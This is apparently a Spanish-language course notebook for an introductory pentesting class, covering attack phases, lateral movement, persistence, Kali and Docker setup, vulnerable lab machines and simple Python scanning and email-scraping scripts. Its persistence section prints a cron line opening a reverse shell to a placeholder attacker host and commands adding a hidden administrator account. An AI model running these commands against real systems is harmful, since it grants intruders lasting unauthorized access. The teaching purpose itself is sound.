<a href="https://colab.research.google.com/github/William-Burbano-Lima/Ciberseguridad-integrador/blob/main/Fundamento_de_Pentesting.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>

Talento Tech - Ciberseguridad
___

 **Pentesting: Fundamentos, Instalación de Herramientas y Uso de Máquinas Virtuales y Docker**, estructurada para una sesión de **4 a 5 horas** con teoría, instalación, configuración y ejercicios prácticos.  

---

# **Clase Completa: Introducción al Pentesting**  
🕒 **Duración:** 4 - 5 horas  
📌 **Nivel:** Básico - Intermedio  
🎯 **Objetivo General:**  
Brindar una base sólida en pentesting, incluyendo sus fundamentos, herramientas esenciales y el uso de entornos de prueba con máquinas virtuales y Docker.  

---

## **1. Fundamentos de Pentesting (40 min)**  
📌 **Objetivos:**  
- Comprender qué es el pentesting y su importancia.  
- Conocer las fases del pentesting y los tipos de pruebas.  

📖 **Contenido:**  
- Definición de Pentesting y su diferencia con el hacking ético.  
- Fases del pentesting:  
  1. **Recolección de información** (OSINT, fingerprinting).  
  2. **Análisis de vulnerabilidades** (escaneo de puertos, servicios y versiones).  
  3. **Explotación** (uso de exploits y pruebas de seguridad).  
  4. **Post-explotación** (movimiento lateral, persistencia).  
  5. **Generación de informes** (documentación y mitigación).  
- Tipos de pentesting:  
  - **Black Box** → Sin información previa.  
  - **White Box** → Acceso total al código y sistemas.  
  - **Gray Box** → Información parcial sobre la infraestructura.  

El **movimiento lateral** y la **persistencia** son dos técnicas avanzadas utilizadas en ataques cibernéticos, especialmente en el contexto del **pentesting** y el **red teaming**. Son fases críticas dentro de la metodología de ataque y defensa en ciberseguridad.  

---  

## **🔹 Movimiento Lateral**  

📌 **Definición:**  
El **movimiento lateral** es la técnica utilizada por un atacante para desplazarse dentro de una red comprometida, escalando privilegios y accediendo a más sistemas después de haber obtenido un punto de entrada inicial.  

📌 **Objetivo:**  
- Expandir el acceso dentro del entorno comprometido.  
- Buscar credenciales, información confidencial o sistemas críticos.  
- Mantener el control del sistema sin ser detectado.  

📌 **Técnicas Comunes:**  
1️⃣ **Pass-the-Hash (PtH)** → Utiliza hashes de contraseñas en lugar de credenciales en texto plano.  
2️⃣ **Pass-the-Ticket (PtT)** → Se aprovecha de tickets Kerberos robados para moverse entre sistemas.  
3️⃣ **Explotación de RDP (Remote Desktop Protocol)** → Uso de credenciales robadas para conectarse a otros equipos.  
4️⃣ **Uso de herramientas como PsExec o WinRM** → Para ejecutar comandos de manera remota en Windows.  
5️⃣ **Explotación de credenciales almacenadas en memoria** → Herramientas como **Mimikatz** pueden extraer contraseñas de la RAM.  
6️⃣ **Malware y backdoors personalizados** → Para moverse sin activar alarmas de seguridad.  

📌 **Ejemplo en Pentesting (Windows - Uso de PsExec):**  
```bash
psexec \\target-ip -u admin -p password cmd
```
📌 **Ejemplo en Linux (Uso de SSH para Movimiento Lateral):**  
```bash
ssh usuario@otro-servidor
```

📌 **Herramientas para Movimiento Lateral:**  
✅ **Mimikatz** → Robo de credenciales.  
✅ **Empire** → Framework para ejecutar scripts maliciosos.  
✅ **BloodHound** → Análisis de rutas de ataque en redes Windows.  
✅ **Cobalt Strike** → Plataforma avanzada para pruebas de penetración.  
✅ **Metasploit** → Explotación y post-explotación en redes.  

---

## **🔹 Persistencia**

📌 **Definición:**  
La **persistencia** es la técnica utilizada para mantener el acceso a un sistema comprometido, incluso después de que el sistema haya sido reiniciado o se hayan cambiado las credenciales.  

📌 **Objetivo:**  

- Asegurar el acceso a largo plazo.  
- Evitar la detección por parte de los administradores.  
- Garantizar que, si se elimina una puerta trasera, haya otra forma de acceso.  

📌 **Técnicas Comunes:**  

1️⃣ **Creación de nuevos usuarios con privilegios administrativos**.  
2️⃣ **Modificación de claves SSH o RDP** para acceso remoto persistente.  
3️⃣ **Instalación de servicios maliciosos** que se ejecutan al reiniciar el sistema.  
4️⃣ **Manipulación de tareas programadas (Windows Task Scheduler o Cron Jobs en Linux)**.  
5️⃣ **Persistencia en el registro de Windows (RunKeys, Winlogon, Services, WMI Event Subscription)**.  
6️⃣ **Uso de rootkits o malware para ocultar presencia en el sistema**.  
7️⃣ **Reemplazo de binarios del sistema** con versiones troyanizadas.  

📌 **Ejemplo en Pentesting (Windows - Creación de Usuario Persistente):**  
```powershell
net user backdoor Pass123! /add
net localgroup Administrators backdoor /add
```

📌 **Ejemplo en Linux (Creación de un Cron Job Persistente):**  
```bash
echo "@reboot root /bin/bash -i >& /dev/tcp/attacker-ip/4444 0>&1" >> /etc/crontab
```

📌 **Herramientas para Persistencia:**  
✅ **Metasploit** → Persistencia con payloads personalizados.  
✅ **Empire** → Persistencia en PowerShell.  
✅ **WinSCP y SCP** → Transferencia de archivos persistentes.  
✅ **Responde** → Para mantener credenciales capturadas activas.  
✅ **Rootkits como Suterusu (Linux) o HiddenEye** → Para ocultar procesos maliciosos.  

---

## **🔹 Relación entre Movimiento Lateral y Persistencia**

📌 **Un atacante realiza movimiento lateral para expandir su control en la red, mientras que la persistencia le permite mantener su acceso en el tiempo.**  
📌 Ambos se utilizan en ataques de **APT (Advanced Persistent Threats)**, donde los atacantes buscan permanecer ocultos el mayor tiempo posible.  

📌 **Ejemplo de un Ataque Completo:**  
1️⃣ **Un atacante obtiene acceso inicial a un sistema** mediante phishing o explotación de vulnerabilidades.  
2️⃣ **Realiza movimiento lateral** para encontrar otros equipos con información sensible.  
3️⃣ **Escala privilegios** para obtener acceso de administrador.  
4️⃣ **Implementa técnicas de persistencia** para asegurarse de que, incluso si el usuario cambia la contraseña, el acceso no se pierda.  
5️⃣ **Exfiltra información y cubre sus huellas** para evitar la detección.  

---

## **🔹 ¿Cómo Protegerse?**  
✅ **Seguridad en credenciales**: Implementar MFA y cambiar contraseñas regularmente.  
✅ **Monitorizar logs y anomalías** en la red.  
✅ **Segmentación de red** para evitar movimientos laterales.  
✅ **Utilizar soluciones EDR (Endpoint Detection & Response)** para detección de actividad sospechosa.  
✅ **Parchear vulnerabilidades** en el sistema operativo y software.  
✅ **Deshabilitar servicios innecesarios** como SMBv1, RDP abierto y privilegios elevados innecesarios.  

---

📝 **Ejercicio:** Debate sobre la ética en el pentesting y el impacto legal.  

---

## **2. Instalación de Herramientas Esenciales (1 hora 20 min)**

📌 **Objetivos:**  
- Instalar un entorno de pentesting con Kali Linux.  
- Configurar herramientas básicas.  

📖 **Contenido:**  
### **2.1 Instalación de Kali Linux**  
🔹 Opción 1: **Máquina Virtual con VirtualBox/VMware**  
1. Descargar la imagen ISO desde [https://www.kali.org/get-kali/](https://www.kali.org/get-kali/).  
2. Crear una VM en **VirtualBox** o **VMware**.  
3. Configurar **2GB RAM, 2 núcleos de CPU, 20GB de almacenamiento**.  
4. Instalar y actualizar con:  
   ```bash
   sudo apt update && sudo apt upgrade -y
   ```

🔹 Opción 2: **Instalación en Docker**  
1. Instalar Docker en el sistema:  
   ```bash
   sudo apt install docker.io -y
   ```
2. Descargar e iniciar Kali Linux en un contenedor:  
   ```bash
   docker pull kalilinux/kali-rolling
   docker run -it --rm kalilinux/kali-rolling /bin/bash
   ```
3. Instalar herramientas dentro del contenedor:  
   ```bash
   apt update && apt install nmap metasploit-framework -y
   ```

🛠️ **Herramientas recomendadas en Kali Linux:**

- **Nmap** → Escaneo de redes.  
- **Metasploit** → Framework de explotación.  
- **Nikto** → Análisis de vulnerabilidades web.  
- **Burp Suite** → Intercepción de tráfico web.  

📝 **Ejercicio:** Instalar y configurar Kali Linux en una máquina virtual o Docker.  

---

## **3. Configuración de Máquinas Virtuales de Prueba (40 min)**  
📌 **Objetivos:**  
- Configurar un entorno seguro para realizar pentesting.  

📖 **Contenido:**  
🔹 **Instalación de Metasploitable2** (VM vulnerable)  
1. Descargar desde [https://sourceforge.net/projects/metasploitable/](https://sourceforge.net/projects/metasploitable/).  
2. Importar en **VirtualBox/VMware**.  
3. Configurar red en modo **Host-Only**.  

🔹 **Instalación de DVWA (Damn Vulnerable Web App) con Docker**  
1. Descargar e iniciar el contenedor:  
   ```bash
   docker run --rm -it -p 80:80 vulnerables/web-dvwa
   ```
2. Acceder a **http://localhost** y configurar la base de datos.  

📝 **Ejercicio:**  
- Lanzar un escaneo con **Nmap** a Metasploitable2.  
- Acceder a DVWA y probar ataques SQL Injection en nivel bajo.  

---

## **4. Uso de Python en Pentesting (1 hora 20 min)**

📌 **Objetivos:**  
- Crear scripts básicos para pruebas de seguridad.  
- Automatizar tareas de recolección de información.  

📖 **Contenido:**  
🔹 **Instalación de librerías útiles:**  
```bash
pip install requests bs4 scapy paramiko
```

🔹 **Ejemplo 1: Escaneo de puertos con Python y Scapy**  
```python
import scapy.all as sc

def escanear_puerto(ip, puerto):
    pkt = sc.IP(dst=ip)/sc.TCP(dport=puerto, flags="S")
    resp = sc.sr1(pkt, timeout=1, verbose=0)
    
    if resp and resp.haslayer(sc.TCP):
        if resp.getlayer(sc.TCP).flags == 0x12:
            print(f"Puerto {puerto} está ABIERTO en {ip}")

ip_objetivo = "192.168.1.1"
for puerto in range(20, 1025):
    escanear_puerto(ip_objetivo, puerto)
```

🔹 **Ejemplo 2: Scraping de correos electrónicos con BeautifulSoup**  

```python
import requests
from bs4 import BeautifulSoup
import re

url = "https://example.com"
res = requests.get(url)
soup = BeautifulSoup(res.text, "html.parser")
emails = re.findall(r"[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+", soup.text)

print("Correos encontrados:", emails)
```

📝 **Ejercicio:**  
- Modificar el script de escaneo de puertos para escanear un rango específico.  
- Realizar web scraping en una página con Python.  

---

## **5. Evaluación Final y Práctica Completa (1 hora)**  
📌 **Objetivo:**  
- Aplicar lo aprendido en un escenario práctico.  

📝 **Ejercicio:**  
1. Escanear la red con **Nmap** y detectar dispositivos conectados.  
2. Analizar un sitio web con **Nikto** y **WhatWeb**.  
3. Capturar tráfico HTTP con **Wireshark** o **tcpdump** en Kali Linux.  
4. Redactar un informe de vulnerabilidades encontradas.  

---

## **6. Conclusión y Recomendaciones**  
📌 **Objetivos:**  
- Reforzar buenas prácticas en pentesting.  
- Presentar recursos adicionales.  

📚 **Recursos recomendados:**  
- OWASP Top 10: [https://owasp.org/www-project-top-ten/](https://owasp.org/www-project-top-ten/)  
- Hack The Box: [https://www.hackthebox.com/](https://www.hackthebox.com/)  
- TryHackMe: [https://tryhackme.com/](https://tryhackme.com/)  

---

### **📌 Materiales Entregables**  
✅ Guía PDF con todos los comandos y scripts.  
✅ Scripts de Python para pentesting.  
✅ Máquina virtual Metasploitable2 y contenedor DVWA.  

---
